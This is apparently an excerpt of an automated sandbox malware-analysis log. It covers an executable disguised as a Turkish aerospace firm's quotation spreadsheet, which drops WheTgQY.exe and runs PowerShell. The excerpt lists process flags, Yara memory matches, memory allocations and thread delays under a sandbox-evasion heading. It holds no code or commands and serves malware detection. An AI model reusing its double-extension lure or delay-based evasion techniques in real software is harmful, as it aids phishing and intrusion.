                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 8F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 9F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: A150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: B150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: B8D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: C8D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: D8D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 1680000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 9080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 7910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: A080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: B080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: B8E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: C8E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: 4A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: DA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 27F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory allocated: 47F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239883Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239765Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239651Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239546Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239435Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239328Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239219Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239109Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238883Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238688Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238463Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238156Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 237989Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 237859Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 237664Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239702Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239589Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239247Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239137Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238992Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238504Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238384Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238278Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238170Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238047Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 237935Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599560Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597465Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597015Jump to behavior
